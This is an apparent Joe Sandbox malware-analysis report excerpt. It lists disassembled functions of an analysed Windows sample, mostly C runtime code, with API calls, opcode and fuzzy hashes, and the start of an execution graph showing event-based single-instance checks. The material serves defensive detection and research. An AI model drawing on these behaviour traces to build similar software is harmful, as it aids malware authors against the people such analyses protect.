                                                                                    • SetLastError.KERNEL32(00000000,00387911,00385ABF,00384FD2), ref: 003879A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: af927656eb5cf450e4b71d78e2a5fcdc142ac61f859bf70bd95201f591c5f2ee
                                                                                    • Instruction ID: d45620aa16fda8be0863644ef9fc2f48b2d981cc41a0a9ab82ede3021a9e2ee0
                                                                                    • Opcode Fuzzy Hash: af927656eb5cf450e4b71d78e2a5fcdc142ac61f859bf70bd95201f591c5f2ee
                                                                                    • Instruction Fuzzy Hash: 5D01AC7211D3125DA6273774BCCAA27275EEB42775F3103AAF1248A1F1EF538C0153A5
                                                                                    Function 00387A31 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID: |,8
                                                                                    • API String ID: 1740715915-3013188374
                                                                                    • Opcode ID: a6e3670cbaf5a0758ffc0ec1814fca3e9eb2c9694896eb1092f8416b841ab853
                                                                                    • Instruction ID: a8608e82934fa49894ee9727a02dde92edee53a2cbfe8e8f4c5a1e920c598679
                                                                                    • Opcode Fuzzy Hash: a6e3670cbaf5a0758ffc0ec1814fca3e9eb2c9694896eb1092f8416b841ab853
                                                                                    • Instruction Fuzzy Hash: 5A510372608702AFDB2BAF10C881BBAB7A7EF50310F3545ADE9155B291D735ED40CB90
                                                                                    Function 0038232A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00382331
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0038233E
                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0038237B
                                                                                      • Part of subcall function 00383D89: _Yarn.LIBCPMT ref: 00383DA8
                                                                                      • Part of subcall function 00383D89: _Yarn.LIBCPMT ref: 00383DCC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 482894088-1405518554
                                                                                    • Opcode ID: 8e264fee3480ec26109701165361aa4f94b307afcaf5c91d186a13eb6f78173d
                                                                                    • Instruction ID: ef61b889935ab4b55580ed692cf1e50c05ac2b5e410876ea56feb957abb72024
                                                                                    • Opcode Fuzzy Hash: 8e264fee3480ec26109701165361aa4f94b307afcaf5c91d186a13eb6f78173d
                                                                                    • Instruction Fuzzy Hash: AC01AD714007849EC722AFAA944104AFFE4BF187107408AAFE5CDCBA01C734E600CB99
                                                                                    Function 00388A62 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00388A13,00000000,?,003DAA14,?,?,?,00388BB6,00000004,InitializeCriticalSectionEx,0039EB88,InitializeCriticalSectionEx), ref: 00388A6F
                                                                                    • GetLastError.KERNEL32(?,00388A13,00000000,?,003DAA14,?,?,?,00388BB6,00000004,InitializeCriticalSectionEx,0039EB88,InitializeCriticalSectionEx,00000000,?,0038896D), ref: 00388A79
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00388AA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: e299fc03f7dd205e4c5bf49269434381e95e227362daf44fd6e44c2c752a8e92
                                                                                    • Instruction ID: 69f11e934b9d96f7edaae8e396f540526788fcc0d1c3e5b75f35979689bd29b4
                                                                                    • Opcode Fuzzy Hash: e299fc03f7dd205e4c5bf49269434381e95e227362daf44fd6e44c2c752a8e92
                                                                                    • Instruction Fuzzy Hash: FAE04830340308BBFF123B60DC07B993E59AB10B40F644061F90DE85E1DB6698218684
                                                                                    Function 0038FC3E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(ECD46234,00000000,00000000,00000000), ref: 0038FCA1
                                                                                      • Part of subcall function 00393CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00392C36,?,00000000,-00000008), ref: 00393D50
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0038FEFC
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0038FF44
                                                                                    • GetLastError.KERNEL32 ref: 0038FFE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: bd958a1a9ea956a142f6869108461c6ab44e3482e52d76d2705ed41934319dce
                                                                                    • Instruction ID: a3d56e4b3cfe23f154f691291b6db39ea8d47047d6fd9f1a5e5d6cb2fdc22532
                                                                                    • Opcode Fuzzy Hash: bd958a1a9ea956a142f6869108461c6ab44e3482e52d76d2705ed41934319dce
                                                                                    • Instruction Fuzzy Hash: 22D18AB5D002489FCF16DFA8D8809EDBBB9FF09304F28456AE915EB351E730A942CB50
                                                                                    Function 003940C0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00393CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00392C36,?,00000000,-00000008), ref: 00393D50
                                                                                    • GetLastError.KERNEL32 ref: 00394124
                                                                                    • __dosmaperr.LIBCMT ref: 0039412B
                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00394165
                                                                                    • __dosmaperr.LIBCMT ref: 0039416C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: 5c34d065f1bc2ee6a364f182cd73a826c9c1d281ad34071a03f9d29febf531b9
                                                                                    • Instruction ID: be40520cfc2e9b505395dba069785002504dcd253e8435e655e8f622440f9aa0
                                                                                    • Opcode Fuzzy Hash: 5c34d065f1bc2ee6a364f182cd73a826c9c1d281ad34071a03f9d29febf531b9
                                                                                    • Instruction Fuzzy Hash: E021FF71600306BFDF23AF668C91D2BB7ADFF50364B118518F9299B200D735EC928BA0
                                                                                    Function 0038B419 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e7681c8900302c39fb97a2b48944080aba32333d56888253c5796dabb4811ef2
                                                                                    • Instruction ID: 4c0e6d14e40394a996e3fe4f0045ce6bfac087eb336a6853b69e4cf76e338781
                                                                                    • Opcode Fuzzy Hash: e7681c8900302c39fb97a2b48944080aba32333d56888253c5796dabb4811ef2
                                                                                    • Instruction Fuzzy Hash: 7321A131600307AFDB22BF628C8297AF7ADFF453A4B168599F914DB652D731EC018760
                                                                                    Function 00395056 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0039505E
                                                                                      • Part of subcall function 00393CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00392C36,?,00000000,-00000008), ref: 00393D50
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00395096
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003950B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 998c9077786691d34d7ef4dc41d7aaf8ebe2590f2eb54d5f3d5a5679942157a1
                                                                                    • Instruction ID: b2bafab0ebe7afd3a0dc2e109c650e60bb768d14ee15464cb73211ae308064c7
                                                                                    • Opcode Fuzzy Hash: 998c9077786691d34d7ef4dc41d7aaf8ebe2590f2eb54d5f3d5a5679942157a1
                                                                                    • Instruction Fuzzy Hash: 8811D6B3501E167FBF2327759C8AD7F699CDE89394B500015F901D6201EE25DE4047B5
                                                                                    Function 00399485 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000), ref: 0039949C
                                                                                    • GetLastError.KERNEL32(?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000,00000000,00000000,?,003905C2,00000000), ref: 003994A8
                                                                                      • Part of subcall function 0039946E: CloseHandle.KERNEL32(FFFFFFFE,003994B8,?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000,00000000,00000000), ref: 0039947E
                                                                                    • ___initconout.LIBCMT ref: 003994B8
                                                                                      • Part of subcall function 00399430: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0039945F,0039826E,00000000,?,0039003B,00000000,00000000,00000000,00000000), ref: 00399443
                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00398281,00000000,00000001,00000000,00000000,?,0039003B,00000000,00000000,00000000,00000000), ref: 003994CD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: b7538f206e0de8cb8e9112ae2c79a87b2fa6cd4533409fc1ae1533b8709d91c4
                                                                                    • Instruction ID: 3cb90ce461dc3991c0d08e3d06949e4c63c8a4f380cdf6953c2049383b4a08f0
                                                                                    • Opcode Fuzzy Hash: b7538f206e0de8cb8e9112ae2c79a87b2fa6cd4533409fc1ae1533b8709d91c4
                                                                                    • Instruction Fuzzy Hash: 39F03037500154BBCF236FD6DC09A8E3F6AFB493B1F014016FA1995630CA329D21DB90
                                                                                    Function 0038172B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch_strlen
                                                                                    • String ID: Madino Mino
                                                                                    • API String ID: 3133806014-1963490786
                                                                                    • Opcode ID: 70b58635e34c3b055d7ee529e9029ee1cd09affc81cd629c71d8bef29cfea1d3
                                                                                    • Instruction ID: 2a78dea11b227770c7ad5bfea82d0032a674f5754ce51ded153d13d349592305
                                                                                    • Opcode Fuzzy Hash: 70b58635e34c3b055d7ee529e9029ee1cd09affc81cd629c71d8bef29cfea1d3
                                                                                    • Instruction Fuzzy Hash: 55418275A007148FCB17EBA8D98586CB7FABB49720F29429AE0249B3D1C7719C83CB51
                                                                                    Function 0038802D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00388052
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2118026453-2084237596
                                                                                    • Opcode ID: 384ee6987fbe95c40b5ace58c5f5f0423187b06f2f7b15d393f4a642ae959e41
                                                                                    • Instruction ID: 09f29906726cda34329f39fba9199c8587ae27aaa955fab33f63d8610f7b042b
                                                                                    • Opcode Fuzzy Hash: 384ee6987fbe95c40b5ace58c5f5f0423187b06f2f7b15d393f4a642ae959e41
                                                                                    • Instruction Fuzzy Hash: CB416C72900209AFCF16EF94CD85AEEBBB6FF48300F558099FA14A7211DB359A52DB50
                                                                                    Function 00383D18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00383D24
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00383D80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                    • String ID: |,8
                                                                                    • API String ID: 593203224-3013188374
                                                                                    • Opcode ID: 427fd564facc3b91d7071efc8cb984484f212e07cc440adbc1ad71b78d5216f5
                                                                                    • Instruction ID: 1b27caec86f79a6795bf2276035cd1afff3da05c0a0fdc66c436b525c5878b45
                                                                                    • Opcode Fuzzy Hash: 427fd564facc3b91d7071efc8cb984484f212e07cc440adbc1ad71b78d5216f5
                                                                                    • Instruction Fuzzy Hash: 99015A35600615AFCB06EF19C895EAD7BB9EF84B50B1500DAE8019F3B1EB70EE44CB91
                                                                                    Function 0038F430 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0038F470
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx$|,8
                                                                                    • API String ID: 2593887523-2417945496
                                                                                    • Opcode ID: 5cec2bcc082e754236bc401d11a0323f89eee34992f501de9c221e6611abf33e
                                                                                    • Instruction ID: 09bd04772ed0aa080fdffa3bdd74f928c24069a3625e39e8c59380f5bd822921
                                                                                    • Opcode Fuzzy Hash: 5cec2bcc082e754236bc401d11a0323f89eee34992f501de9c221e6611abf33e
                                                                                    • Instruction Fuzzy Hash: EFE01232580318BBDF132F51DC0AEDE7F15EB447A1F008462F91956160D6B2996197D0
                                                                                    Function 0038F2B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc$|,8
                                                                                    • API String ID: 2773662609-2771951685
                                                                                    • Opcode ID: b99e38411c9ac1f99dabe77ab18d52c33383cc2521b81f810c78552f1a39371a
                                                                                    • Instruction ID: 9ec5624506b9d39264892e2fcf7199658742d62751dcf44a6286479edddd0a8b
                                                                                    • Opcode Fuzzy Hash: b99e38411c9ac1f99dabe77ab18d52c33383cc2521b81f810c78552f1a39371a
                                                                                    • Instruction Fuzzy Hash: 4BE0C236680324BBCA2332A19C0BEEDB918DB45B61F040471FD056625199A2481087D5

                                                                                    Execution Graph

                                                                                    Execution Coverage:5.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:11.9%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:40
                                                                                    execution_graph 60104 417250 60128 40254e 60104->60128 60112 417274 60226 40fa9c _EH_prolog lstrlenA 60112->60226 60115 40fa9c 4 API calls 60116 41729b 60115->60116 60117 40fa9c 4 API calls 60116->60117 60118 4172a2 60117->60118 60230 40f9e1 60118->60230 60120 4172ab 60121 4172ee OpenEventA 60120->60121 60122 4172d4 CloseHandle Sleep 60121->60122 60123 4172fb 60121->60123 60424 40fb4d 60122->60424 60125 417303 CreateEventA 60123->60125 60234 41695f _EH_prolog 60125->60234 60425 4024d7 memset 60128->60425 60130 402562 60131 4024d7 9 API calls 60130->60131 60132 402573 60131->60132 60133 4024d7 9 API calls 60132->60133 60134 402584 60133->60134 60135 4024d7 9 API calls 60134->60135 60136 402595 60135->60136 60137 4024d7 9 API calls 60136->60137 60138 4025a6 60137->60138 60139 4024d7 9 API calls 60138->60139 60140 4025b7 60139->60140 60141 4024d7 9 API calls 60140->60141 60142 4025c8 60141->60142 60143 4024d7 9 API calls 60142->60143 60144 4025d9 60143->60144 60145 4024d7 9 API calls 60144->60145 60146 4025ea 60145->60146 60147 4024d7 9 API calls 60146->60147 60148 4025fb 60147->60148 60149 4024d7 9 API calls 60148->60149 60150 40260c 60149->60150 60151 4024d7 9 API calls 60150->60151 60152 40261d 60151->60152 60153 4024d7 9 API calls 60152->60153 60154 40262e 60153->60154 60155 4024d7 9 API calls 60154->60155 60156 40263f 60155->60156 60157 4024d7 9 API calls 60156->60157 60158 402650 60157->60158 60159 4024d7 9 API calls 60158->60159 60160 402661 60159->60160 60161 4024d7 9 API calls 60160->60161 60162 402672 60161->60162 60163 4024d7 9 API calls 60162->60163 60164 402683 60163->60164 60165 4024d7 9 API calls 60164->60165 60166 402694 60165->60166 60167 4024d7 9 API calls 60166->60167 60168 4026a5 60167->60168 60169 4024d7 9 API calls 60168->60169 60170 4026b6 60169->60170 60171 4024d7 9 API calls 60170->60171 60172 4026c7 60171->60172 60173 4024d7 9 API calls 60172->60173 60174 4026d8 60173->60174 60175 4024d7 9 API calls 60174->60175 60176 4026e9 60175->60176 60177 4024d7 9 API calls 60176->60177 60178 4026fa 60177->60178 60179 4024d7 9 API calls 60178->60179 60180 40270b 60179->60180 60181 4024d7 9 API calls 60180->60181 60182 40271c 60181->60182 60183 4024d7 9 API calls 60182->60183 60184 40272d 60183->60184 60185 